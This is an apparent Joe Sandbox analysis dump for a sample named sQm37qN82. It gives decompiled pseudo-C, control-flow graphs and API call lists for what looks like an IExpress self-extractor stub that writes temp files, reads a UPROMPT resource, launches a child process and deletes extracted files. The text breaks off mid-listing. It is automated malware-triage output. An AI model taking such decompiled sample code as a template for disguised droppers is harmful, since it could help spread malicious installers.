                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetCurrentProcessId.KERNEL32 ref: 00DE7191
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetCurrentThreadId.KERNEL32 ref: 00DE719A
                                                                                                                                                                                                          • Part of subcall function 00DE7155: GetTickCount.KERNEL32 ref: 00DE71A3
                                                                                                                                                                                                          • Part of subcall function 00DE7155: QueryPerformanceCounter.KERNEL32(?), ref: 00DE71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00DE72B8,00000058), ref: 00DE6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00DE6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00DE6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00DE6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00DE6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00DE6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00DE6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: ae62d9a2fe8d890aa6c4bc2269447529ab7053d247ad6d16e6bb1e0237969ef2
                                                                                                                                                                                                        • Instruction ID: 687bd1e8b92640cc21b91b1ed6fd1ab836fd306cc47e41a36da982f2f9f28ab2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae62d9a2fe8d890aa6c4bc2269447529ab7053d247ad6d16e6bb1e0237969ef2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F4107349443D5CFDB21BB6AEC8476E77A0EB547A4F68002AE945EB390CB70C840DBB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 587 de58c8-de58d5 588 de58d8-de58dd 587->588 588->588 589 de58df-de58f1 LocalAlloc 588->589 590 de5919-de5959 call de1680 call de658a CreateFileA LocalFree 589->590 591 de58f3-de5901 call de44b9 589->591 595 de5906-de5910 call de6285 590->595 601 de595b-de596c CloseHandle GetFileAttributesA 590->601 591->595 600 de5912-de5918 595->600 601->595 602 de596e-de5970 601->602 602->595 603 de5972-de597b 602->603 603->600
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00DE58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00DE1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00DE658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00de58cd
                                                                                                                                                                                                        0x00de58d1
                                                                                                                                                                                                        0x00de58d3
                                                                                                                                                                                                        0x00de58d5
                                                                                                                                                                                                        0x00de58d8
                                                                                                                                                                                                        0x00de58d8
                                                                                                                                                                                                        0x00de58da
                                                                                                                                                                                                        0x00de58db
                                                                                                                                                                                                        0x00de58e1
                                                                                                                                                                                                        0x00de58ed
                                                                                                                                                                                                        0x00de58f1
                                                                                                                                                                                                        0x00de591e
                                                                                                                                                                                                        0x00de592c
                                                                                                                                                                                                        0x00de5943
                                                                                                                                                                                                        0x00de594a
                                                                                                                                                                                                        0x00de594d
                                                                                                                                                                                                        0x00de5953
                                                                                                                                                                                                        0x00de5959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de595b
                                                                                                                                                                                                        0x00de595c
                                                                                                                                                                                                        0x00de5963
                                                                                                                                                                                                        0x00de596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5972
                                                                                                                                                                                                        0x00de5974
                                                                                                                                                                                                        0x00de597a
                                                                                                                                                                                                        0x00de597a
                                                                                                                                                                                                        0x00de596c
                                                                                                                                                                                                        0x00de58f3
                                                                                                                                                                                                        0x00de5901
                                                                                                                                                                                                        0x00de5906
                                                                                                                                                                                                        0x00de590b
                                                                                                                                                                                                        0x00de5910
                                                                                                                                                                                                        0x00de5910
                                                                                                                                                                                                        0x00de5918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00DE5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00DE5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-3228030758
                                                                                                                                                                                                        • Opcode ID: 2a3284c6c62eb006abedb0563964d90731e486b2931c11ebb708ae7a8650ed34
                                                                                                                                                                                                        • Instruction ID: ffa0052ce252556b4273bd020dce401646bc2b682d70037d7f5b8f0a49da1064
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a3284c6c62eb006abedb0563964d90731e486b2931c11ebb708ae7a8650ed34
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03112631700351ABC7207F7B6C8DA9B7E9DDF453A4B100615B509D72C6CA709C0586B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 de3fef-de4010 632 de410a-de411a call de6ce0 631->632 633 de4016-de403b CreateProcessA 631->633 634 de40c4-de4101 call de6285 GetLastError FormatMessageA call de44b9 633->634 635 de4041-de406e WaitForSingleObject GetExitCodeProcess 633->635 650 de4106 634->650 638 de4070-de4077 635->638 639 de4091 call de411b 635->639 638->639 643 de4079-de407b 638->643 644 de4096-de40b8 CloseHandle * 2 639->644 643->639 646 de407d-de4089 643->646 648 de40ba-de40c0 644->648 649 de4108 644->649 646->639 647 de408b 646->647 647->639 648->649 651 de40c2 648->651 649->632 650->649 651->650
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00DE3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00DE6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00DE44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xde8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xde9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xde9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xde9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00de3fef
                                                                                                                                                                                                        0x00de3ffa
                                                                                                                                                                                                        0x00de4001
                                                                                                                                                                                                        0x00de4008
                                                                                                                                                                                                        0x00de400a
                                                                                                                                                                                                        0x00de400b
                                                                                                                                                                                                        0x00de4010
                                                                                                                                                                                                        0x00de410a
                                                                                                                                                                                                        0x00de411a
                                                                                                                                                                                                        0x00de411a
                                                                                                                                                                                                        0x00de401c
                                                                                                                                                                                                        0x00de401d
                                                                                                                                                                                                        0x00de401e
                                                                                                                                                                                                        0x00de401f
                                                                                                                                                                                                        0x00de4033
                                                                                                                                                                                                        0x00de403b
                                                                                                                                                                                                        0x00de40ca
                                                                                                                                                                                                        0x00de40e9
                                                                                                                                                                                                        0x00de40f8
                                                                                                                                                                                                        0x00de4101
                                                                                                                                                                                                        0x00de4106
                                                                                                                                                                                                        0x00de4106
                                                                                                                                                                                                        0x00de4108
                                                                                                                                                                                                        0x00de4108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4108
                                                                                                                                                                                                        0x00de4049
                                                                                                                                                                                                        0x00de405c
                                                                                                                                                                                                        0x00de4062
                                                                                                                                                                                                        0x00de4068
                                                                                                                                                                                                        0x00de406e
                                                                                                                                                                                                        0x00de4070
                                                                                                                                                                                                        0x00de4077
                                                                                                                                                                                                        0x00de407f
                                                                                                                                                                                                        0x00de4089
                                                                                                                                                                                                        0x00de408b
                                                                                                                                                                                                        0x00de408b
                                                                                                                                                                                                        0x00de4089
                                                                                                                                                                                                        0x00de4077
                                                                                                                                                                                                        0x00de4091
                                                                                                                                                                                                        0x00de409c
                                                                                                                                                                                                        0x00de40a8
                                                                                                                                                                                                        0x00de40b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de40c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de40c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00DE4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00DE4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00DE405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DE40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00DE40DC
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00DE40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 3589f74df8a0b769975910cde9bc604b19b93af42edc915e1697f1c6f59d3b9f
                                                                                                                                                                                                        • Instruction ID: 487be74ca076b9968a549746476ac726bf8591681edf5a59edaa114dec7d3085
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3589f74df8a0b769975910cde9bc604b19b93af42edc915e1697f1c6f59d3b9f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0318631641398ABEB20BF66DC89FABB77CEBD4710F100169F649DA2A1C6305D85CB71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 652 de51e5-de520b call de468f LocalAlloc 655 de522d-de523c call de468f 652->655 656 de520d-de5228 call de44b9 call de6285 652->656 662 de523e-de5260 call de44b9 LocalFree 655->662 663 de5262-de5270 lstrcmpA 655->663 668 de52b0 656->668 662->668 666 de527e-de529c call de44b9 LocalFree 663->666 667 de5272-de5273 LocalFree 663->667 674 de529e-de52a4 666->674 675 de52a6 666->675 670 de5279-de527c 667->670 673 de52b2-de52b5 668->673 670->673 674->670 675->668
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00DE468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00DE468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00DE44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xde9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00de51fb
                                                                                                                                                                                                        0x00de5207
                                                                                                                                                                                                        0x00de520b
                                                                                                                                                                                                        0x00de523c
                                                                                                                                                                                                        0x00de5268
                                                                                                                                                                                                        0x00de5270
                                                                                                                                                                                                        0x00de528b
                                                                                                                                                                                                        0x00de5293
                                                                                                                                                                                                        0x00de529c
                                                                                                                                                                                                        0x00de52a6
                                                                                                                                                                                                        0x00de52b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de52b0
                                                                                                                                                                                                        0x00de529e
                                                                                                                                                                                                        0x00de5279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de527b
                                                                                                                                                                                                        0x00de5273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5273
                                                                                                                                                                                                        0x00de524a
                                                                                                                                                                                                        0x00de5250
                                                                                                                                                                                                        0x00de5256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5256
                                                                                                                                                                                                        0x00de5219
                                                                                                                                                                                                        0x00de5223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00DE2F4D,?,00000002,00000000), ref: 00DE5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DE5250
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 878d077225706d8ee5079a24cff19d87f0930813e1d36339f81666f8e889fe20
                                                                                                                                                                                                        • Instruction ID: d0a918e1f0e1075e4835fce6eef3ccfa2ac0572e576a966485e4e7c1f70e7ddb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 878d077225706d8ee5079a24cff19d87f0930813e1d36339f81666f8e889fe20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7311E2B53017C2AFE7647B776C89B3B619DDB88398B10402DB742DA394DAB99C005238
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00DE52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xde91e0; // 0x818e88
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xde8a24 == 0 &&  *0xde9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xde8a24 == 0 &&  *0xde9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00DE1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        					if(( *0xde9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00DE65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00DE2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xde8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xde9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00DE1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xde8a20 =  *0xde8a20 & 0x00000000;
                                                                                                                                                                                                        				return E00DE6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00de52b6
                                                                                                                                                                                                        0x00de52b6
